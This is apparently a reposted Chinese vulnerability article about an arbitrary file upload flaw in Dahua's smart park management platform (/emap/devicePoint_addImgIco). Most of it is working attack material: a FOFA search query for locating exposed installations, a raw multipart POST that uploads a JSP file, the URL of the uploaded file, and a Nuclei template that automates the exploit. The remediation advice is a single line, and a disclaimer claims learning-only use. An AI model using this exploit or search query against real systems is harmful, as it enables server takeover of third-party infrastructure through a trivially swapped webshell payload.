大华智慧园区综合管理平台/emap/devicePoint RCE漏洞

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

大华园区综合管理平台可能是一个集成多种管理功能的平台,例如安全监控、设备管理、人员管理等。这样的平台通常有助于提高园区运营效率和安全性。

大华园区综合管理平台/emap/devicePoint接口处存在任意文件上传漏洞,恶意攻击者可能会上传后门文件,造成服务器失陷

Ⅱ、fofa语句

复制代码
body="/WPMS/asset/lib/gridster/"

Ⅲ、漏洞复现

POC

复制代码
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: 127.0.0.1
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
 
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="ceshi.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
 
<% out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--

1、构建poc

2、文件上传后,端口重定向到8314

复制代码
http://127.0.0.1​:8314/upload/emap/society_new/ico_res_c2c0a12203d2_on.jsp

Ⅳ、Nuclei-POC

复制代码
id: Dahua-emap-devicePoint-uploadfile

info:
  name: 大华园区综合管理平台/emap/devicePoint接口处存在任意文件上传漏洞,恶意攻击者可能会上传后门文件,造成服务器失陷
  author: WLF
  severity: high
  metadata: 
    fofa-query: body="/WPMS/asset/lib/gridster/"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
        
        --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
        Content-Disposition: form-data; name="upload"; filename="{{filename}}.jsp"
        Content-Type: application/octet-stream
        Content-Transfer-Encoding: binary
        
        <% out.println("Hello World!");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
        --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--




    extractors:
      - type: json      #类型为json      
        part: body      # 提取的位置 
        json:
          - .data   

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"jsp","data")

Ⅴ、修复建议

做好访问控制策略

相关推荐
米小虾2 小时前
AI Agent 安全实战指南:当智能体开始"不听话",开发者该如何应对?
人工智能·安全·agent
tntxia15 小时前
网络安全漏洞修复(一)
安全
泯泷2 天前
第 2 篇:设计第一套字节码:Opcode、Instruction 与 Constant Pool
前端·javascript·安全
泯泷2 天前
第 1 篇:从 1 + 2 开始:亲手写出第一台 JSVM
前端·javascript·安全
Flynt7 天前
npm v12 来了:allowScripts 默认关闭,我的项目差点跑不起来
安全·npm·node.js
冬奇Lab11 天前
Skill 系列(02):Skill 安全风险——三类攻击面的实战测试
人工智能·安全·开源
Aphasia31114 天前
VPN 与内网穿透
安全
Mr_愚人派16 天前
当"Claude"不再是 Claude:一次第三方 API 代理引发的 AI 身份伪造排查实录
人工智能·安全
DaLi Yao16 天前
【无标题】
人工智能·安全
Alsn8616 天前
等待学习-学习目录:Docker 容器安全攻防
学习·安全·docker